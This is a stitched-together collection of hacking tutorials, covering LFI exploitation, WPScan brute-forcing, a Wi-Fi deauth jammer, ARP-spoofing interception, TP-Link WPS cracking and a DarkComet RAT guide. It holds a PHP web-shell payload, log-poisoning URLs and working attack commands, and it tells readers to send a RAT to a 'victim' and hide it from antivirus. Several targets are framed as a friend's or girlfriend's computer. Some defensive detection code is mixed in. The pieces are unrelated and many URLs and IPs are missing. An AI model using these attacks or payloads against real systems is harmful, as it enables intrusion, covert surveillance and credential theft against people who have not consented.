Spirited wolf's

How To shut down windows 7 Remotely

So, hello guys.

This is Spirited wolf right here, and today we are gonna talk about how we can shut down your friend's/client's/girlfriend's PC remotely using Metasploit :D

And I am too lazy at writing, so I just made a video demonstration; watch it ;) And I hope you will definitely enjoy this :)


LFI (Local File Inclusion) Penetration Tutorial

Originally written by: "Fredrik Nordberg Almroth"

Local File Inclusion

As the title says, this is a "short" and descriptive guide about various methods to exploit using a local file inclusion (LFI).


I will cover the following topics:

• Poison NULL Bytes

• Log Poisoning

• /proc/self/

• Alternative Log Poisoning

• Malicious image upload

• Injection of code by the use of e-mails

• Creativity


So the question is: what is an LFI?

An LFI is, as the title says, a method for servers/scripts to include local files at run-time, in order to make complex systems of procedure calls.

Well, most of the time you find LFI vulnerabilities in the URLs of web pages, mainly because developers tend to like the use of GET requests when including pages. Nothing more. Nothing less.

So now, let's proceed, shall we?

How do you find (fingerprint) them?

Let's say you find the following URL:



Notice that this URL goes to do.php, which is a sub-domain to

It has several parameters for the internal do.php to parse: the not and the for variables.

Let's study them a bit more. The not variable contains the value "exist.php", and the for variable contains "real".

Now it turned pretty obvious, didn't it? The not variable seems to take another PHP file as an argument, most probably for inclusion!


Let's try to play around with it!

Now what?

Let's tamper with the URL to see what we can do with it. Change the content of the not variable to "/etc/passwd" and see what happens.

Of course you can change /etc/passwd to any other file of your choice, but we'll just stick with it throughout this tutorial.



Let's check the result!

If you get a result looking something like this:

ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

Then sir, you've done it correctly. You've found an LFI.

The /etc/passwd file is world-readable on *NIX systems. That means you can, by a 99% chance, read it, unless someone has changed its permissions or the open_basedir configuration.

But more on that some other time!

Now let's try another scenario.

Say the programmer of the website coded it like this:

<?php include("include/" . $_GET['for'] . ".php"); ?>

What do we do then? We can't read /etc/passwd because the script appends .php to the end of the file name.

What to do, what to do...

Gladly for you, there's another trick here.

Poison NULL Byte.

The NULL byte is a special byte used everywhere in the background of your computer (or your target's).

It's the binary representation of 00000000. Yes, 8 zeros in binary, or the hexadecimal representation of



One of the usages of this special byte is to terminate strings.

If you've been programming for a while, you must know what a string is. An amount of text! Okay, it sounds complex now, but this method is really, really simple.

To bypass the .php concatenation, we simply append after our



And hopefully, your result is once again:

root:x:0:0:root:/root:/bin/bash (…)

Awesome, we can now read any file on the server (with the privileges of the account the web server runs as)! Now you might ask, how can we execute code through this? The answer is...

Log poisoning:

Say we're exploiting a plain, normal Apache server. By default, it creates two log files, called access_log and error_log, on the server.

If we tamper with those logs we can successfully upload our own PHP code to the server, which might give you remote command execution if you wish; the choice is yours.

The question is, where are those logs stored? Gladly for you, I've compiled a small list. Here you go:


C:\Program Files\Apache Group\Apache\logs\access.log
C:\Program Files\Apache Group\Apache\logs\error.log
C:\program files\wamp\apache2\logs

Now, there are two good methods for proceeding, depending on which log you choose.

The best one (in my opinion) is by accessing the error_log. This method is a little outside the box.

Say you find an LFI on this server. By simply going to this URL, PHP code will be saved in the error_log:


Now try to reach it by going here:


If your result says something like Linux, then your code execution was successful. Yeah yeah, you get the point. It gets stored in the error_log because the

<?PHP $s=$_GET;@chdir($s['x']);echo@system($s['y'])?>

file does not exist.

Method #2: accessing the access_log. It's a little bit more complicated; the best way to do this is to put PHP code in your


There's a great plug-in for Firefox called "User Agent Switcher" to do this on the fly.

Other than that, it's the same thing. Go to:

or any other file accessible on the server, with your user-agent spoofed to your PHP snippet.

Then go to the access_log in order to execute the code, e.g.:

http://site.com/this/exploit/do.php?for=/var/log/apache/logs/access_log&x=/&y=<<command goes here>>

Yeah sure, you're so cool, you can execute your own code! Now, let's be hardcore.

The Linux kernel is fascinating. I'm not sure if you've heard of this, but /proc/self is a symbolic link (symlink) going to the instance of the target HTTP

There are several things you can do by using this link. One is to do the access_log method, by simply spoofing your user-agent to PHP code, then trying to include /proc/self/environ.

Everyone knows that these days. That's not fun. However, your code will be executed!

Let's move on to more... uncommon methods.

You can obtain the HTTP configuration file by simply trying to include /proc/self/cmdline, because most of the time the config file is set by a command-line

A simple but cool "feature"; nothing malicious here, that's just the way it works.

What you choose to do with the config file is up to you. The log-file location(s) tend to be in there...

You've got the grip now, I'll just keep writing.

There is yet another way to resolve the log files by using this link: by simply going to the file descriptor of the log file (the running stream).

No need for you to run a dictionary attack in order to resolve the different log files or to include /proc/self/cmdline.

Now, how do we access those file descriptors? Well sir, /proc/self tends to have a folder (?) called fd. You guessed it right: fd stands for file descriptor. The content within fd is numeric IDs going to different open

So the easiest way for us to find it is to simply iterate our way


http://site.com/this/exploit/do.php?

Sooner or later, you'll find one of the log files. Having done that, you just go with the access_log or the error_log

Now seriously. Have you ever had any success with the ordinary "Log Poisoning" methods? I mean, in like 95% of the cases your requests get URI encoded, and that ruins your code. So here comes an alternative method:
Alternative Log Poisoning:

Apache has the tendency to log the authorized user if any is

The Authorization header is a part of the HTTP protocol; I bet you've seen it. It creates a prompt asking for a username and password, as .htaccess does when you try to reach a protected folder. Internet Explorer makes a prompt looking like this:

Yeah, well. The username and password get sent base64 encoded, with : as a separator. And as you might have figured out, the base64 won't get URI encoded! So by providing this header in your HTTP request:

Authorization: Basic

the code will stay untouched, and simply be unpacked by Apache straight into the logs. The base64 is the small PHP payload I've used earlier, just with a : at the end to follow the HTTP RFCs.
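As an added defender-side example (not part of Almroth's guide), the following Python scanner flags the traces these methods leave in an Apache access log: null bytes and traversal in the query, includes of /etc/passwd, /proc/self/ or log paths, PHP tags in the User-Agent or Referer, and the base64 Basic Authorization trick just described. The log lines are constructed, and the trailing quoted Authorization field assumes a custom LogFormat rather than Apache's stock combined format.

```python
import base64
import re
from urllib.parse import unquote

# Apache "combined" format plus one assumed extra field: the quoted
# Authorization header value (needs a custom LogFormat; "-" when absent).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
    r'(?: "(?P<auth>[^"]*)")?$'
)

PHP_TAG = re.compile(r"<\?(?:php|=)?", re.IGNORECASE)
# Paths this guide shows being pulled in through an LFI.
SENSITIVE = ("/etc/passwd", "/proc/self/", "/var/log/", "access_log",
             "error_log", "/var/spool/mail/")

# Constructed sample: one benign request, then the tricks from the text.
_AUTH_B64 = base64.b64encode(b"<?php echo 1; ?>:").decode()
SAMPLE_LINES = [
    '10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /do.php?not=exist.php&for=real HTTP/1.1" 200 512 "-" "Mozilla/5.0" "-"',
    '10.0.0.9 - - [01/Jan/2020:10:00:01 +0000] "GET /do.php?not=../../../../etc/passwd%00 HTTP/1.1" 200 1804 "-" "Mozilla/5.0" "-"',
    '10.0.0.9 - - [01/Jan/2020:10:00:02 +0000] "GET /do.php?for=/proc/self/environ HTTP/1.1" 200 912 "-" "<?php echo 1; ?>" "-"',
    f'10.0.0.9 - - [01/Jan/2020:10:00:03 +0000] "GET /index.php HTTP/1.1" 401 0 "-" "curl/7.0" "Basic {_AUTH_B64}"',
]
SAMPLE_LOG = "\n".join(SAMPLE_LINES)


def decode_basic_auth(value):
    """Return the decoded 'user:pass' of a 'Basic <b64>' value, else None."""
    if not value or not value.startswith("Basic "):
        return None
    try:
        return base64.b64decode(value[6:], validate=True).decode("utf-8", "replace")
    except ValueError:          # binascii.Error is a ValueError subclass
        return None


def analyze_line(line):
    """Parse one log line; return (client_ip, decoded_target, findings) or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    f = m.groupdict()
    raw_target = f["target"]
    target = unquote(raw_target)
    findings = []
    if "%00" in raw_target or "\x00" in target:
        findings.append("null-byte")                 # poison NULL byte
    if "../" in target or "..\\" in target:
        findings.append("traversal")
    if any(s in target.lower() for s in SENSITIVE):
        findings.append("sensitive-path")            # /etc/passwd, /proc/self/, logs
    for field in ("ua", "referer"):
        if PHP_TAG.search(f[field] or ""):
            findings.append("php-in-" + field)       # classic access_log poisoning
    if PHP_TAG.search(target):
        findings.append("php-in-query")              # error_log poisoning via a bad include
    creds = decode_basic_auth(f.get("auth"))
    if creds and PHP_TAG.search(creds):
        findings.append("php-in-basic-auth")         # base64 hides the payload from URI encoding
    return f["ip"], target, findings


def scan_log(text):
    """Return one dict per line that carries at least one finding."""
    hits = []
    for line in text.splitlines():
        parsed = analyze_line(line.strip())
        if parsed and parsed[2]:
            ip, target, findings = parsed
            hits.append({"ip": ip, "target": target, "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["target"], ", ".join(hit["findings"]))
```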
Now that we're on to it, exploiting using different methods and

Why not exploit LFI with a JPG?

Malicious image upload:

Yes, you heard me. You can use a picture in order to execute code by the use of an LFI vulnerability. However, you need special software to do this for you. The attack consists of changing the EXIF data of the image of your

Say you're exploiting a community which allows image uploads, for, let's say, your avatar. By tampering with the EXIF data and by finding an LFI you can take full control! Cool, huh?

The EXIF data tends to hold the camera model, year, place, location, etc. from when the image was taken, but, as proven before, it's rather easy to tamper with.
Injection of code by the use of e-mails:

Say your target server has port 109 or 110 open (POP2 or POP3) for the handling of e-mails. You could send an e-mail to the HTTP server user on the target box, like apache@site.com, and then try to include /var/spool/mail/apache if it exists.

It's possible to execute code through this as well. However, it's not very common to find this specific exploit. Of course, the mail you send will contain the PHP code for you to

There are literally hundreds of ways to perform this attack, depending on the mail server running in the back-end. Qmail, for example, stores the incoming mails in /var/log/maillog by default, but as has been said before, this is thinking outside the

Why stop here?

I'm sure the Linux kernel, IRIX, AIM, Windows, SunOS, BSD and other OSes provide yet more interesting exploit scenarios. Do they have SSH open? If so, try to inject PHP code as the SSH username and go grab the SSH log. Will it work? Maybe?

Can the embedding of malicious content like the JPG EXIF field be done within an MP3 file? Try it yourself. Be creative.

How to hack a WordPress website with WPScan

This tutorial in the category WordPress hacking shows you how to scan WordPress for possible vulnerabilities and enumerate WordPress users. We will conclude this tutorial with a demonstration of how to brute force root passwords using WPScan in Kali Linux. WPScan is a black box WordPress vulnerability scanner and a must-have tool for any WordPress web developer to scan for vulnerabilities and solve issues before they get exploited. Together with Nikto, a great webserver assessment tool, this tool should be part of any penetration test targeting a WordPress website.
WPScan comes pre-installed on the following Linux distributions:

The latest version is WPScan 2.8 and the database currently contains:
  • Total vulnerable versions: 98
  • Total vulnerable plugins: 1.076
  • Total vulnerable themes: 361
  • Total version vulnerabilities: 1.104
  • Total plugin vulnerabilities: 1.763
  • Total theme vulnerabilities: 443

Windows is not supported by WPScan. The latest version is available for download at the following website (Linux & Mac): http://wpscan.org/

WPScan update

Start with the following command to update the vulnerabilities database:
wpscan --update

Scanning WordPress vulnerabilities

Then use the following command to scan a website for possible vulnerabilities:
wpscan --url [wordpress url]

How to enumerate WordPress users

Use the following command to enumerate the WordPress users:

wpscan --url [wordpress url] --enumerate u

How to brute force the root password

Use the following command to brute force the password for user root:
wpscan --url [wordpress url] --wordlist [path to wordlist] --username [username to brute force] --threads [number of threads to use]

How to avoid WordPress User Enumeration

If you want to avoid WordPress user enumeration, you should avoid using the username as the nickname and display name, which are shown publicly. The best option is to choose an administrator username which consists of random characters and use another nickname. WPScan scans for usernames in the URLs, so if you don't use the username there it cannot be scanned by WPScan.

How to avoid WordPress password brute forcing

The best way to keep attackers using brute force methods out is to limit the login attempts for an IP address. There are several plug-ins available for WordPress to limit login attempts. The latest WordPress versions have this option by default. Make sure you limit attempts to a maximum of 3 and increase the lock-out time a lot after 2 lock-outs (which is 6 password attempts).
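An added example (not from this tutorial or from WordPress itself) of the lockout policy above in Python: three wrong passwords lock the address, and once an address has been locked twice (6 attempts) every further lock lasts much longer. The 20-minute and 24-hour durations and the client address are assumptions.

```python
from dataclasses import dataclass


@dataclass
class IPState:
    failures: int = 0          # wrong passwords since the last lock or success
    lockouts: int = 0          # how many times this address has been locked
    locked_until: float = 0.0  # epoch seconds; 0 means not locked


class LoginLimiter:
    """Per-IP login limiter implementing the policy described above.

    max_failures wrong passwords lock the address for lockout_s seconds; once
    an address has been locked escalate_after times, every further lock lasts
    escalated_lockout_s. The durations are assumed, not taken from the page.
    """

    def __init__(self, max_failures=3, lockout_s=20 * 60,
                 escalate_after=2, escalated_lockout_s=24 * 3600):
        self.max_failures = max_failures
        self.lockout_s = lockout_s
        self.escalate_after = escalate_after
        self.escalated_lockout_s = escalated_lockout_s
        self.state = {}

    def login(self, ip, password_ok, now):
        """Record one attempt; returns 'locked', 'ok', 'failed' or 'locked-now'."""
        st = self.state.setdefault(ip, IPState())
        if now < st.locked_until:
            return "locked"          # refuse even a correct password while locked
        if password_ok:
            st.failures = 0
            return "ok"
        st.failures += 1
        if st.failures < self.max_failures:
            return "failed"
        # Third wrong password in a row: lock, escalating after repeated locks.
        st.failures = 0
        st.lockouts += 1
        if st.lockouts > self.escalate_after:
            st.locked_until = now + self.escalated_lockout_s
        else:
            st.locked_until = now + self.lockout_s
        return "locked-now"


def simulate():
    """Walk a constructed address through the policy; returns (statuses, final state)."""
    limiter = LoginLimiter()
    ip = "203.0.113.7"                       # constructed, documentation range
    statuses = []
    for t in (0, 1, 2):                      # three wrong passwords -> first lock
        statuses.append(limiter.login(ip, False, t))
    statuses.append(limiter.login(ip, True, 100))   # right password, still locked
    for t in (1300, 1301, 1302):             # lock expired; second burst -> second lock
        statuses.append(limiter.login(ip, False, t))
    for t in (2600, 2601, 2602):             # third burst -> escalated lock
        statuses.append(limiter.login(ip, False, t))
    return statuses, limiter.state[ip]


if __name__ == "__main__":
    for step, status in enumerate(simulate()[0], 1):
        print(step, status)
```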

Enumeration Arguments
Find below an overview of enumeration arguments which can be used for scanning:

--enumerate | -e [option(s)] Enumeration.
option :
u – usernames from id 1 to 10
u[10-20] usernames from id 10 to 20 (you must write [] chars)
p – plugins
vp – only vulnerable plugins
ap – all plugins (can take a long time)
tt – timthumbs
t – themes
vt – only vulnerable themes
at – all themes (can take a long time)
Multiple values are allowed: "-e tt,p" will enumerate timthumbs and plugins


Scanning Webservers with Nikto for vulnerabilities

Nikto is a very popular and easy to use webserver assessment tool to find potential problems and vulnerabilities very quickly. This tutorial shows you how to scan webservers for vulnerabilities using Nikto in Kali Linux. Nikto comes standard as a tool with Kali Linux and should be your first choice when pen testing webservers and web applications. Nikto scans for 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version-specific problems on over 270 servers, as mentioned on the official Nikto website. These are some of the major features in the current version:

  • SSL Support (Unix with OpenSSL or maybe Windows with ActiveState’s
  • Full HTTP proxy support
  • Checks for outdated server components
  • Save reports in plain text, XML, HTML, NBE or CSV
  • Template engine to easily customize reports
  • Scan multiple ports on a server, or multiple servers via input file (including nmap output)
  • LibWhisker’s IDS encoding techniques
  • Easily updated via command line
  • Identifies installed software via headers, favicons and files
  • Host authentication with Basic and NTLM
  • Subdomain guessing
  • Apache and cgiwrap username enumeration
  • Mutation techniques to “fish” for content on web servers
  • Scan tuning to include or exclude entire classes of vulnerability
  • Guess credentials for authorization realms (including many default id/pw combos)
  • Authorization guessing handles any directory, not just the root
  • Enhanced false positive reduction via multiple methods: headers,
    page content, and content hashing
  • Reports “unusual” headers seen
  • Interactive status, pause and changes to verbosity settings
  • Save full request/response for positive tests
  • Replay saved positive requests
  • Maximum execution time per target
  • Auto-pause at a specified time
  • Checks for common “parking” sites
  • Logging to Metasploit
  • Thorough documentation

Another nice feature in Nikto is the possibility to define the test using the -Tuning parameter:

0 – File Upload
1 – Interesting File / Seen in logs
2 – Misconfiguration / Default File
3 – Information Disclosure
4 – Injection (XSS/Script/HTML)
5 – Remote File Retrieval – Inside Web Root
6 – Denial of Service
7 – Remote File Retrieval – Server Wide
8 – Command Execution / Remote Shell
9 – SQL Injection

a – Authentication Bypass
b – Software Identification
c – Remote Source Inclusion
x – Reverse Tuning Options (i.e., include all except specified)

Scanning webservers with Nikto

Let’s start Nikto to scan for interesting files using the following command:
nikto -host [hostname or IP] -Tuning 1

Nikto will display the Apache, OpenSSL and PHP version of the targeted webserver. Also it will give you an overview of possible vulnerabilities including the Open Source Vulnerabilities Database (OSVDB) reference. When you search the OSVDB website for the reference code it will explain the possible vulnerability in more detail. The OSVDB project currently covers 120,980 vulnerabilities, spanning 198,973 products from 4,735 researchers, over 113 years.
Run the following command to run all scans against a particular host. Please be a little patient because this might take a while to complete.
nikto -host [hostname or IP]


Websploit Wifi Jammer

In this tutorial we will be exploring the Websploit Wifi Jammer module which we’ve edited to work with the latest version of Kali Linux. The Websploit Wifi Jammer module is a great tool to automatically disconnect every client connected to the targeted wireless network and access point. The WiFi Jammer module also prevents new and disconnected clients from connecting to the WiFi network. The module has been edited to work with Kali 2.0 and the new monitoring interface names (wlan0mon, wlan1mon etc.). For your convenience we’ve also set wlan0mon as the default interface. The edited Websploit Wifi Jammer module script can be downloaded using the following link:
In order to work with the new script in Websploit you have to replace the script in the following directory in Kali Linux with the downloaded script:

Websploit WiFi Jammer Tutorial

Open a new terminal and start websploit with the following command:
websploit
Use the following command to show an overview of available modules from which we will select the Websploit WiFi Jammer module:
show modules
Select the wifi/wifi_jammer module.
Use the following command to set the wifi/wifi_jammer module from the Wireless / Bluetooth modules section so we can configure the necessary parameters:
use wifi/wifi_jammer
Type the following command to show the available options for the Websploit WiFi Jammer module:
show options
We need to specify the target’s BSSID, ESSID and the channel on which the access point is broadcasting. Also change the wireless interface and monitoring interface if needed. The default values for these parameters have been set to wlan0 and wlan0mon according to the new naming format.
To determine the target’s BSSID, ESSID and channel you can use a tool like aircrack-ng or similar. It is beyond the scope of this tutorial to explain this process in detail. The following tutorials teach you how to use Airodump-ng, which provides you with the necessary details (or watch the video tutorial at the bottom of this post):
Use the following set command in Websploit to set the parameters:
set channel [channel number]
Now type run to start the WiFi Jammer module on the specified target:
Websploit Wifi Jammer running on the selected target.
Disconnected and unable to connect again.
The Websploit WiFi Jammer module uses airodump-ng to determine connected clients and aireplay-ng to spam deauth messages to those connected clients. As you can see on the last screenshot we are disconnected on a Windows host and unable to connect again. This will remain this way until we stop the WiFi Jammer and close the aireplay-ng windows.
We’ve mentioned ‘connected clients’ a couple of times throughout this tutorial. Note that a connected client can be anything from a regular desktop PC to WiFi security cameras, home automation systems and any other system using WiFi for data transmission and operation. This is one of the many reasons why you should not use critical devices on wireless networks but use wired networks instead.


Man-in-the-middle attacks using ARP spoofing

Today we will learn how to perform penetration testing of MITM attacks using ARP spoofing. At first we must understand what ARP spoofing is and how hackers can use it to exploit and execute severe man-in-the-middle attacks.

ARP spoofing is a type of attack in which a malicious actor sends falsified ARP (Address Resolution Protocol) messages over a local area network. This results in the linking of an attacker’s MAC address with the IP address of a legitimate computer or server on the network. Let’s see how to pen test a man-in-the-middle attack by ARP spoofing of a machine. So let's get started.

1) Kali Linux
3) Tools that are preinstalled on Kali


Step 1:
In this step we will scan the network for a victim’s computer which is alive, using the most powerful scanner, NMAP.
Here is the command to scan: nmap -F

Here my victim's IP is


Step 2:
Now let's set up IP forwarding on the Kali machine so that the victim can still surf the web while being attacked.
Command: echo 1 > /proc/sys/net/ipv4/ip_forward

Step 3:
Now let's arpspoof our victim, whose IP address we found above, using the following commands.
Command: arpspoof -i eth0 {here is my default gateway & eth0 is my Ethernet device}

Command2: arpspoof -i eth0

Step 4:
Now, to test whether the man-in-the-middle attack is successful, we use tools that are pre-installed in Kali: Driftnet and Urlsnarf.
Open a window and type driftnet -i eth0, which opens a small window that captures all the images the victim views on the web.
Keeping that window open, open another window and type urlsnarf -i eth0; urlsnarf gives the details of the URLs the victim browses on the web.
Below is the screenshot of the successful man-in-the-middle attack using ARP spoofing.


That’s it, hope you liked our tutorial on penetration testing of man-in-the-middle attacks using ARP spoofing!! I will be coming up with many more tutorials.
Note: This was only for educational purposes.
Thank you!!
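As an added defender-side example (not part of this tutorial), a small Python detector for the two symptoms the arpspoof commands above produce on the wire: the gateway IP suddenly answering from a new MAC, and one MAC claiming both the gateway and the victim. The ARP replies and the gateway address are constructed; a real deployment would feed it frames from a packet capture.

```python
from collections import defaultdict

# Constructed ARP "is-at" replies as a monitoring host on the LAN would see
# them: (seconds, sender IP, sender MAC). Real devices are the gateway
# aa:..:01 and the victim bb:..:20; cc:..:99 is the attacker running arpspoof
# in both directions, exactly as the two commands in Step 3 do.
SAMPLE_REPLIES = [
    (0.0, "192.168.1.1", "aa:aa:aa:aa:aa:01"),
    (0.5, "192.168.1.20", "bb:bb:bb:bb:bb:20"),
    (5.0, "192.168.1.1", "cc:cc:cc:cc:cc:99"),   # "I am the gateway", sent to the victim
    (5.1, "192.168.1.20", "cc:cc:cc:cc:cc:99"),  # "I am the victim", sent to the gateway
    (7.0, "192.168.1.1", "cc:cc:cc:cc:cc:99"),   # arpspoof repeats every ~2 s
]
GATEWAY_IP = "192.168.1.1"   # assumed gateway for the constructed capture


class ArpWatch:
    """Tracks IP->MAC claims and raises alerts on the two signs of arpspoof."""

    def __init__(self, gateway_ip):
        self.gateway_ip = gateway_ip
        self.ip_to_mac = {}
        self.mac_to_ips = defaultdict(set)

    def observe(self, ip, mac):
        """Feed one reply; returns the list of alert strings it triggered."""
        alerts = []
        previous = self.ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            alerts.append(f"mac-changed:{ip}:{previous}->{mac}")
            if ip == self.gateway_ip:
                alerts.append("gateway-impersonation")   # the classic MITM symptom
        self.ip_to_mac[ip] = mac
        if ip not in self.mac_to_ips[mac]:
            self.mac_to_ips[mac].add(ip)
            if len(self.mac_to_ips[mac]) > 1:
                # one interface answering for two hosts: arpspoof run both ways
                alerts.append(f"one-mac-many-ips:{mac}")
        return alerts


def run(replies, gateway_ip):
    """Replay a capture; returns (timestamp, alert) pairs in order."""
    watch = ArpWatch(gateway_ip)
    out = []
    for ts, ip, mac in replies:
        for alert in watch.observe(ip, mac):
            out.append((ts, alert))
    return out


if __name__ == "__main__":
    for ts, alert in run(SAMPLE_REPLIES, GATEWAY_IP):
        print(f"t={ts:4.1f}s  {alert}")
```

A DHCP reassignment or a replaced NIC also changes an IP-to-MAC pairing, so treat mac-changed alone as a lead and the gateway-impersonation and one-mac-many-ips alerts as the strong signals.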


How To Use DarkComet

This tutorial will walk you through setting up a Remote Administration Tool (aka RAT or trojan) which you can use to send to your victim. Once they open your RAT file, you'll be able to access and control their computer as if you were sitting at it, download and execute files, retrieve saved passwords, look through their webcam, keylog, and more. What you need:
  1. Download DarkComet from the link above and open DarkComet.exe. If your anti-virus isn't turned off, it may flag this program as a virus. This is just a false positive, because the program is used to create viruses.
  2. Click DarkComet-RAT drop-down menu in the top left corner, then click Server Module > Minimalist
  3. Make the Stub ID whatever you want.
  4. For IP/DNS, put in your ACTUAL IP address, not your router IP. You can find your IP address by going to http://www.whatsmyip.org/
  5. Click the "Normal" button in the top left corner, choose a name for your server file and save it somewhere.
  6. If you haven't forwarded port 1604 yet, DO IT NOW. You can do this by typing your router IP address into your browser (usually or and logging into your router. Find the port forwarding option (every router is different) and forward port 1604 to your PC. If you don't know how to port forward, google port forwarding for your router or look in the manual for instructions. If you're not behind a router and are directly connected into your modem, this won't matter for you.
  7. Download and open SandBoxie. This is what we'll use to test the server safely on yourself to make sure it works. Make sure DarkComet is still open, and drag your newly created server file into the SandBoxie window. If prompted, choose to open on Default box. Once the server runs in SandBoxie, you should see a pop-up Dark Comet window letting you know a victim has connected. If nothing happens, you did something wrong (most likely ports aren't forwarded correctly)
  8. In the Dark Comet window, double click the victim that appeared in the list (you). You'll now see all the options available for you in the list on the left.
  9. Now all you do, is send your server file to your victim and when they open it, you'll have full access to them.
NOTE: Anti-Virus programs will flag your server, so your victim must not have any anti-virus software. To get around this, you need to crypt your server with a FUD (Fully-UnDetectable) Crypter. Anti-Virus programs are being updated all the time so a crypter that worked a month ago may not be FUD anymore. You must search around for crypters online through google or youtube, or create your own using the tutorial provided in this app. You may also choose to bind your server to an image file for example, to make it less suspicious, or you could send it using a java drive by. Creating a server is only the first step to successfully hacking your victims, the more time you spend working on it, the higher your chances of success.




TP Link Archer C5 Router Hacking

Today we got our hands on a brand new TP Link Archer C5 router which we will be testing for known vulnerabilities such as hidden backdoors, brute-forceable default passwords and WPS vulnerabilities. In this new WiFi hacking tutorial we will be using different tools on Kali Linux 2.0 like Reaver, pixiewps and the Aircrack-ng suite to exploit possible vulnerabilities. TP Link is known to use easy to break default passwords, such as the WPS PIN as default wireless password or a password which is derived directly from the MAC address. Especially the last one would make it very easy to retrieve the password, because the MAC address is not meant to be secret and is actually sent with every single wireless packet sent from the router. With a packet analyser like Wireshark it is very easy to retrieve MAC addresses from sending and receiving devices, including the router. In this tutorial we’ll be using airodump-ng for this purpose.

TP Link Archer C5 Router Specifications

The TP Link Archer C5 Router is a consumer grade router priced at approximately $70 and offers a lot of value for the money. The router supports the 802.11ac standard and offers dual band simultaneous 2.4GHz 300Mbps and 5GHz 867Mbps connections for a total available bandwidth of 1.2Gbps. Both IPv4 and IPv6 are supported by the router. The TP-Link Archer C5 has the following antennas and ports available:
  • 2 External detachable antenna
  • 1 Gigabit WAN port
  • 4 Gigabit LAN ports
  • 2 USB ports for external devices
The USB ports can be used for external devices such as storage devices or a shared printer. Something which seems to be a nice feature on the router is the option to install an isolated wireless guest network (with bandwidth control!) separated from your main network. With this feature you don’t have to worry about sharing the password from your main network with guests.

TP Link Archer C5 package contents

The contents of the package included:
  • AC1200 Wireless Dual Band Gigabit Router Archer C5
  • 2 detachable antennas
  • Power supply unit
  • Resource CD
  • Ethernet Cable
  • Quick Installation Guide
When we sum up the specifications and features of the TP Link Archer C5 router it seems like a great router for this price. This middle segment TP Link router is targeted at home and small office users. The router is very affordable for a lot of people and seems like a great alternative for the router provided by your ISP. All together this is enough reason to question and test the security of this router. Especially the target group of this TP Link router should think twice before unpacking the router and getting it up and running as fast as possible to benefit from its great speed and features, without even thinking about proper and safe configuration. Let’s continue this tutorial to see if and how we can hack and secure this router, starting by looking at the default passwords.

TP Link Archer C5 Default passwords and settings

As we already expected the default password for the wireless network is the default WPS PIN which consists of 8 numbers. The C5 router we’re testing has the following default WPS PIN which is used as the default wireless key: 98159338. The default username and password to access the router settings is just like all TP Link routers:
Username: admin
Password: admin

TP Link Archer C5 Default SSID settings

The standard SSID name for the 2.4 GHz network is TP-LINK_A361 and for the 5 GHz network it is TP-LINK_A360. The standard SSID is based on the router's MAC address and consists of the last 4 digits of the MAC address minus 1 for the 2.4 GHz SSID, and minus 2 with _5G added for the 5 GHz SSID.
The MAC address is in hexadecimal notation so if the MAC address ends with a letter that letter is actually a number in decimal notation. For example when the MAC address ends with an A, which is hexadecimal for 10 in decimal, you should subtract 1 from 10 to determine the last digit of the default SSID which would be 9 in this case. If you want to calculate the last digit of the MAC address using the default SSID you would know that it would be A when the last digit of the default SSID is 9.
So far so good because there are TP Link routers around which have their default wireless password based on the MAC address. This is not the case for the TP Link Archer C5 router. Let’s continue with connecting the router and see if it has any WPS vulnerabilities we can exploit.

Scanning the TP Link Archer C5 for WPS vulnerabilities

Wi-Fi Protected Setup (WPS) provides simplified mechanisms to connect to wireless networks with a PIN consisting of 8 numbers. The PIN exchange mechanism is vulnerable to brute-force attacks which return the PIN and WPA key to the attacker, who can then connect to the wireless network. Theoretically there are 10^8 (= 100.000.000) possible values for the WPS PIN. Unfortunately the WPS PIN consists of 8 numbers divided into 3 segments which can be tested separately with a brute force attack. The last digit is a checksum which can be calculated. The PIN is composed as follows:
  • Part 1 of the pin is 5 digits = 10^4 (= 10.000) brute force attempts needed to retrieve this segment.
  • Part 2 of the PIN is 3 digits = 10^3 (1.000) brute force attempts needed to retrieve this segment.
  • Part 3 of the PIN is 1 digit which is a calculated checksum.
A WPS brute force tool like Reaver, which is included with Kali Linux, brute forces parts 1 and 2 of the PIN in a maximum of 11.000 attempts. When a router is vulnerable to this WPS attack it will be 100% effective and grant the attacker access to your network no matter how strong the password is. During the attack with Reaver the attacker has to be in range of the access point. A lot of routers nowadays have rate limiting for WPS brute force attacks, which means that the WPS part will lock up until it is manually unlocked by the owner of the router. During the lock it is not possible to brute force any of the WPS PIN segments. A commonly used method to avoid these lock-ups is MDK3, which can be used to force the router to reboot and release the WPS lock. MDK3 is deprecated nowadays and most routers are invulnerable to DoS attacks with MDK3. Many hackers are looking for new ways to force routers to reboot and unlock the rate limiting through vulnerabilities and exploits. It will probably be a matter of time before new methods pop up which do work.
WPS is enabled by default on the TP Link Archer C5 router so we will be checking it for known WPS vulnerabilities. We’ve done several tutorials on Hacking Tutorials about exploiting WPS vulnerabilities with Reaver and Pixiewps so we won’t get into great detail on these. For detailed tutorials on these subjects have a look at <tutorial name> and <tutorial name>. Let’s fire up Kali Linux and see if we can hack the TP Link Archer C5 router by brute forcing the WPS PIN with Reaver.

Brute forcing the Archer C5 WPS PIN with reaver

First we put our Wifi adapter in monitoring mode using the following command:
airmon-ng start wlan0
The interface for the monitoring adapter will be wlan0mon. You will most likely receive a message about processes that might cause trouble; kill them using the kill command. We can use airodump-ng to locate our access point and retrieve the MAC address. Use the following command to start airodump-ng:
airodump-ng wlan0mon
The MAC address appears in the first column which can be copied to your clipboard.
[Image: TP Link Archer C5 - airmon-ng]
Next we will use the following command to start Reaver:
reaver -i wlan0mon -b [router MAC address] -c [channel] -vv
The Reaver attack will start by testing some common PINs and will then start at 0 and work its way up to 9.999 for the first WPS PIN segment. As we already expected, the TP Link router has rate limiting on the number of WPS attempts. It locks up after a couple of attempts and we need to unlock it manually. When the rate limiting kicks in, Reaver throws a warning as follows:
[Image: TP Link Archer C5 - Reaver attack]

TP Link Archer C5 Pixie dust attack

